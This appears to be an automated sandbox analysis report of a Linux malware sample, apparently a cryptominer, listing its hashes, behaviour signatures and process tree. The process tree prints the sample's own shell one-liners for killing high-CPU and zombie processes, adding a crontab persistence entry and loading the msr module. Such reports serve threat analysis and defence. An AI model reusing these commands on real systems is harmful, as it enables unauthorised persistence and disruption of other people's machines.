Analysis
-
max time kernel
0s -
max time network
139s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
resource tags
-
submitted
17-08-2022 06:24
General
-
Target
x86_64
-
Size
1.8MB
-
MD5
6a029df4c5e466511749a1c5321cb576
-
SHA1
074d800744815a43eac098f0c1b5c03814769bc3
-
SHA256
a4a90999ade02ca7104e2553aede3c82decbd319d67059d43be99415acb03c26
-
SHA512
0665dc76cab1c9c0055346c5d080f0caf0abfbd31bc8fab7e3497e16fcd00d2207656fa3421224114d90f8dbc4fc4ca783691c547a5fa70ec6323d522de904b3
Score
9/10
Malware Config
Signatures
-
Attempts to identify hypervisor via CPU configuration 1 TTPs 1 IoCs
Checks CPU information for indicators that the system is a virtual machine.
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Reads CPU attributes 1 TTPs 5 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/x86_64/tmp/x86_641⤵
- Attempts to identify hypervisor via CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- 'systemd[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- 'systemd[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/idid -u3⤵
-
/bin/grepgrep -v grep3⤵
-
/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v /usr/sbin/httpd3⤵
-
/bin/grepgrep -v -- "systemd[[:space:]]*\$"3⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
/bin/shsh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/x86_64 > /dev/null 2>&1;' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/x86_64\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"2⤵
-
/bin/rmrm -rf /tmp/.cron3⤵
- Writes file to tmp directory
-
/bin/grepgrep -v grep3⤵
-
/usr/bin/crontabcrontab -l3⤵
-
/bin/grepgrep -v /tmp/x86_643⤵
-
/usr/bin/crontabcrontab /tmp/.cron3⤵
- Writes file to tmp directory
-
/bin/rmrm -rf /tmp/.cron3⤵
- Writes file to tmp directory
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'systemd[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'systemd[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'systemd[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'systemd[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/crontabcrontab -l1⤵
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep "/tmp/x86_64\$"1⤵
-
/usr/bin/sortsort1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/uniquniq1⤵
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep -- "systemd[[:space:]]*\$"1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/usr/bin/wcwc -l1⤵
-
/bin/shsh -c "/sbin/modprobe msr > /dev/null 2>&1"1⤵
-
/sbin/modprobe/sbin/modprobe msr2⤵